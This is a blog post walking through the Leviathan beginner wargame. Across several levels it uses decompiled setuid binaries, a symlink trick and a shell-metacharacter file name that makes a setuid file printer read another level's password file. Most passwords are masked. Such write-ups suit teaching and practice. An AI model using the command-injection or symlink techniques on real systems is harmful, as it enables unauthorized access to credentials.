Sunday, June 13, 2010

leviathan.intruded.net

上午把这个过了,最容易的一台机器
ssh: leviathan.intruded.net
port: 10101
username: level1
password: leviathan

密码列表(blog里隐掉了)
level1: leviathan
level2: ********
level3: ********
level4: ********
level5: ********
level6: ********
level7: ********
level8: ********
----------------------------------
1
cat .backup/bookmarks.html | grep --color pass
<DT><A HREF="http://nahtaivel.intruded.net/passwordus.html" TEMP: "AFeSdWEf"ADD_DATE="1155384634" LAST_CHARSET="ISO-8859-1" ID="rdf:#$2wIU71">password to level2</A>
直接访问
********
----------------------------------
2
/wargame/check
下载下来打开,看到 sex secret god love
这个就是密码,验证,打开一个shell

level2@leviathan:/wargame$ ./check
password: sex secret god love
sh-3.1$ id
uid=1001(level2) gid=1001(level2) euid=1002(level3) groups=1001(level2)
********
----------------------------------
3
level3@leviathan:/wargame$ ln -s /home/level4/.passwd /tmp/file.log
level3@leviathan:/wargame$ ./prog
********
这个纯粹是猜出来的
直接运行提示 Cannot find /tmp/file.log
/tmp是可写不可读的状态

----------------------------------
4
/wargame
ida pro打开,直接伪代码看
/*
 * IDA pseudocode for level 4's binary.
 *
 * v1..v4 occupy adjacent stack slots ([bp-0Bh], [bp-7h], [bp-3h], [bp-1h]),
 * so the four .rodata loads below assemble an 11-byte string on the stack and
 * &v1 is then used as the expected value in strcmp().  x86 is little-endian,
 * so the bytes of each dword appear in reverse order relative to the hex
 * constants in the .rodata dump (which is why reverse() is needed later in
 * this post).  word 0A66h contributes 'f' followed by '\n' -- fgets() keeps
 * the trailing newline, so the stored constant has to include it too.
 *
 * Review note: a fixed secret compared with strcmp() against bytes sitting in
 * .rodata is recoverable by anyone who can read the binary; that is the
 * weakness this level is built around.
 */
int __cdecl do_stuff()
{
  int v1; // [sp+11Dh] [bp-Bh]@1   -- first 4 bytes of the expected string
  int v2; // [sp+121h] [bp-7h]@1   -- next 4 bytes
  __int16 v3; // [sp+125h] [bp-3h]@1   -- 'f' then '\n'
  char v4; // [sp+127h] [bp-1h]@1   -- presumably the terminating NUL; byte_8048741 is not shown in the .rodata dump
  char v5; // [sp+1Dh] [bp-10Bh]@1  -- start of a 256-byte input buffer (bp-10Bh..bp-0Ch), not a single char

  v1 = dword_8048737;
  v2 = dword_804873B;
  v3 = word_804873F;
  v4 = byte_8048741;
  fgets(&v5, 256, (FILE *)stdin);   // at most 255 chars + NUL, which exactly fills the slots below v1
  if ( strcmp(&v5, (const char *)&v1) )
  {
    puts("bzzzzzzzzap. WRONG");
  }
  else
  {
    puts("[You've got shell]!");
    seteuid(0x3ECu);   // 0x3EC == 1004; by this box's uid numbering (level2=1001, level3=1002) that would be level5 -- inferred
    system("/bin/sh");
  }
  return 0;
}

点开v1
.rodata:08048737 dword_8048737   dd 706C6E73h            ; DATA XREF: do_stuff+9 r
.rodata:0804873B dword_804873B   dd 746E6972h            ; DATA XREF: do_stuff+11 r
.rodata:0804873F word_804873F    dw 0A66h                ; DATA XREF: do_stuff+19 r
mysql出场了


mysql> select 0x706C6E73;
+------------+
| 0x706C6E73 |
+------------+
| plns       |
+------------+
1 row in set (0.00 sec)

mysql> select 0x746E6972;
+------------+
| 0x746E6972 |
+------------+
| tnir       |
+------------+
1 row in set (0.00 sec)

mysql> select 0x66;
+------+
| 0x66 |
+------+
| f    |
+------+
1 row in set (0.00 sec)

mysql> select reverse('ftnirplns');
+----------------------+
| reverse('ftnirplns') |
+----------------------+
| snlprintf            |
+----------------------+
1 row in set (0.00 sec)
密码是 ********

----------------------------------
5
这关是个算法题?
~/.Trash/bin

Ida pro 打开
/*
 * IDA pseudocode for level 5's binary (~/.Trash/bin).
 *
 * Opens /home/level6/.passwd, reads one line and prints every byte as 8 bits,
 * most significant first, each group followed by a space -- the same pattern
 * the dictionary program further down reproduces.  The stream is never
 * fclose()d and the fgets() result is not checked.
 *
 * `char a1` is how IDA rendered argc; `r`, v4 and v5 look like prologue
 * artifacts (frame pointer / &argv) rather than program logic -- inferred.
 */
int __cdecl main(char a1)
{
  int result; // eax@2
  FILE *v2; // eax@1
  int  r; // [sp+40h] [bp+0h]@1
  int v4; // [sp+3Ch] [bp-4h]@1
  char *v5; // [sp+30h] [bp-10h]@1
  FILE *v6; // [sp+20h] [bp-20h]@1
  unsigned int v7; // [sp+24h] [bp-1Ch]@3   -- byte index into buf
  char v8; // [sp+2Fh] [bp-11h]@4   -- current byte, shifted left one bit per inner iteration
  signed int v9; // [sp+28h] [bp-18h]@4   -- bit counter 0..7
  char *v10; // [sp+18h] [bp-28h]@11

  v4 =  r;
  v5 = &a1;
  v2 = fopen("/home/level6/.passwd", (const char *)&unk_80485E8);   // unk_80485E8 is the mode string IDA did not resolve; presumably "r"
  v6 = v2;
  if ( v2 )
  {
    fgets(buf, 256, v6);   // buf is a global not shown in this listing; return value unchecked
    v7 = 0;
    while ( 1 )
    {
      v10 = buf;
      if ( v7 >= strlen(buf) - 1 )   // stops one short of strlen(); with an empty buf, strlen()-1 wraps to SIZE_MAX and the loop would walk past the buffer
        break;
      v8 = buf[v7];
      v9 = 0;
      while ( v9 <= 7 )
      {
        if ( v8 >= 0 )   // sign bit clear -> current most-significant bit is 0
          putchar(48);   // '0'
        else
          putchar(49);   // '1'
        v8 *= 2;   // move the next bit into the sign position (signed-char wrap is implementation-defined)
        ++v9;
      }
      putchar(32);   // ' '
      ++v7;
    }
    result = putchar(10);   // '\n'
  }
  else
  {
    result = -1;   // fopen() failed (file missing or not readable by the caller)
  }
  return result;
}
执行的结果是
00110110 01101100 01111001 01110110 01001100 01011000 01000011 01000001 00001010

做了个字典:
#include <stdio.h>
#include <string.h>

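/*
 * Prints the 8-bit, MSB-first binary pattern of every character in a fixed
 * alphabet, four entries per line, so the bit groups emitted by the level-5
 * binary can be looked up by hand.
 *
 * Output is byte-identical to the original program: "<c> : <8 bits>", then
 * " \t" between entries and " \n" after every fourth entry (no newline after
 * the final entry).
 *
 * Changes from the original: conforming main() signature, size_t loop index
 * (no signed/unsigned comparison against strlen), the bit extraction no longer
 * relies on the sign of a doubled `char`, and main() returns a value.
 */
enum { BITS_PER_CHAR = 8, ENTRIES_PER_LINE = 4 };

/* Emit c's bits from most to least significant as '0' / '1' characters. */
static void print_bits(unsigned char c)
{
    for (int bit = BITS_PER_CHAR - 1; bit >= 0; bit--) {
        putchar(((c >> bit) & 1) ? '1' : '0');
    }
}

int main(void)
{
    /* Alphabet to tabulate.  '0' appears twice ("...7890abc..."), which is
     * why the table in this post lists it twice; kept as-is so the output
     * matches that table exactly. */
    static const char alphabet[] =
        "01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
    const size_t count = strlen(alphabet);

    for (size_t i = 0; i < count; i++) {
        printf("%c : ", alphabet[i]);
        print_bits((unsigned char)alphabet[i]);
        /* Every fourth entry ends a row; otherwise separate with a tab. */
        if (i % ENTRIES_PER_LINE == ENTRIES_PER_LINE - 1) {
            printf(" \n");
        } else {
            printf(" \t");
        }
    }
    return 0;
}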
/*
0 : 00110000    1 : 00110001    2 : 00110010    3 : 00110011
4 : 00110100    5 : 00110101    6 : 00110110    7 : 00110111
8 : 00111000    9 : 00111001    0 : 00110000    a : 01100001
b : 01100010    c : 01100011    d : 01100100    e : 01100101
f : 01100110    g : 01100111    h : 01101000    i : 01101001
j : 01101010    k : 01101011    l : 01101100    m : 01101101
n : 01101110    o : 01101111    p : 01110000    q : 01110001
r : 01110010    s : 01110011    t : 01110100    u : 01110101
v : 01110110    w : 01110111    x : 01111000    y : 01111001
z : 01111010    A : 01000001    B : 01000010    C : 01000011
D : 01000100    E : 01000101    F : 01000110    G : 01000111
H : 01001000    I : 01001001    J : 01001010    K : 01001011
L : 01001100    M : 01001101    N : 01001110    O : 01001111
P : 01010000    Q : 01010001    R : 01010010    S : 01010011
T : 01010100    U : 01010101    V : 01010110    W : 01010111
X : 01011000    Y : 01011001    Z : 01011010
*/
查表
00110110 01101100 01111001 01110110 01001100 01011000 01000011 01000001 00001010
********
----------------------------------
6
/*
 * IDA pseudocode for level 6's /wargame/printfile.
 *
 * Checks that argv[1] exists with access(), then builds "/bin/cat <argv[1]>"
 * with snprintf() and hands it to system().  The file name is interpolated
 * unescaped into a shell command line, so any shell metacharacter in it is
 * interpreted by /bin/sh -- the command injection the transcript below uses.
 * Two further weaknesses: access() tests the real uid rather than the
 * effective one, and there is a check-then-use window between access() and
 * the cat.  The usual fix is to pass the argument as its own argv element to
 * execve()/posix_spawn() instead of building a shell string.
 *
 * The `*((_DWORD **)v5 + 1)` / `*(... + 4)` expressions read as argv[0] and
 * argv[1] (v5 = &a1, a1 = argc) -- inferred from the decompiler's rendering.
 * `r`, v3 and v4 look like prologue artifacts.
 */
signed int __cdecl main(char a1)
{
  int  r; // [sp+230h] [bp+0h]@1
  int v3; // [sp+22Ch] [bp-4h]@1
  char *v4; // [sp+224h] [bp-Ch]@1
  char *v5; // [sp+18h] [bp-218h]@1
  int v7; // [sp+24h] [bp-20Ch]@5   -- start of the command buffer; snprintf writes up to 0x1FF bytes here (bp-20Ch..bp-0Dh)
  int v8; // [sp+1Ch] [bp-214h]@6   -- never assigned in this listing, yet returned below

  v3 =  r;
  v4 = &a1;
  v5 = &a1;
  if ( a1 <= 1 )   // argc < 2
  {
    puts("*** File Printer ***");
    printf("Usage: %s filename\n", **((_DWORD **)v5 + 1));   // argv[0]
    return -1;
  }
  if ( access(*(const char **)(*((_DWORD *)v5 + 1) + 4), 0) )   // access(argv[1], F_OK); F_OK == 0
  {
    puts("You cant have that file...");
    return 1;
  }
  snprintf((char *)&v7, 0x1FFu, "/bin/cat %s", *(_DWORD *)(*((_DWORD *)v5 + 1) + 4));   // argv[1] inserted verbatim, unquoted
  system((const char *)&v7);   // /bin/sh parses the whole string, metacharacters included
  return v8;   // uninitialised as decompiled -- possibly system()'s status that IDA failed to track; cannot be confirmed from this listing
}
/var/tmp下有几个symlink,但是直接读还是不行。看了看命令的构造,很显然,需要从文件名上动手。
本想自己弄,结果发现/var/tmp下有了

level6@leviathan:/var/tmp$ /wargame/printfile ./\|cat\ /home/level7/.passwd
/bin/cat: ./: Is a directory
********

----------------------------------
7
level7@leviathan:/wargame$ ./sphinx
usage: ./sphinx <4 digit code>
level7@leviathan:/wargame$ ./sphinx 1111
Wrong
第一眼,想写个代码遍历 - -|||

IDA Pro

/*
 * IDA pseudocode for level 7's /wargame/sphinx.
 *
 * The "4 digit code" is the literal 7123 stored in v6 and compared against
 * atoi(argv[1]); on a match the effective uid is set to 0x3EF (1007, which
 * the id output below shows is level8) and /bin/sh is spawned.  atoi() does
 * no error checking, so non-numeric input simply compares as 0.  A code
 * embedded as an immediate in the binary is readable straight out of the
 * disassembly, which is the point of this level.
 *
 * As in the other listings, `char a1` is IDA's rendering of argc and the
 * `*((_DWORD **)v5 + 1)` expressions read as argv[0] / argv[1] -- inferred.
 */
int __cdecl main(char a1)
{
  int result; // eax@5
  int  r; // [sp+30h] [bp+0h]@1
  int v3; // [sp+2Ch] [bp-4h]@1
  char *v4; // [sp+24h] [bp-Ch]@1
  char *v5; // [sp+10h] [bp-20h]@1
  int v6; // [sp+20h] [bp-10h]@1   -- the expected code, hard-coded

  v3 =  r;
  v4 = &a1;
  v5 = &a1;
  v6 = 7123;
  if ( a1 != 2 )   // argc != 2
  {
    printf("usage: %s<4 digit code>\n", **((_DWORD **)v5 + 1));   // argv[0]
    exit(-1);
  }
  if ( atoi(*(const char **)(*((_DWORD *)v5 + 1) + 4)) == v6 )   // atoi(argv[1]) == 7123
  {
    seteuid(0x3EFu);   // 1007 == level8 per the id output below
    result = system("/bin/sh");
  }
  else
  {
    result = puts("Wrong");
  }
  return result;
}

level7@leviathan:/$ /wargame/sphinx 7123
sh-3.1$ id
uid=1006(level7) gid=1006(level7) euid=1007(level8) groups=1006(level7)
脑残了,居然不相信7123是密码

啊啊啊啊a

********
----------------------------------

level8@leviathan:~$ cat CONGRATULATIONS
Well Done, you seem to have used *nix system before, now try something more serious. Your completion string is "Unix is easy!!!".

1 comment:

  1. Thanks for your post!
    I have a question:
    You use IDA Pro to disassemble the file, but how do you use IDA Pro to open files on leviathan.intruded.net? :(
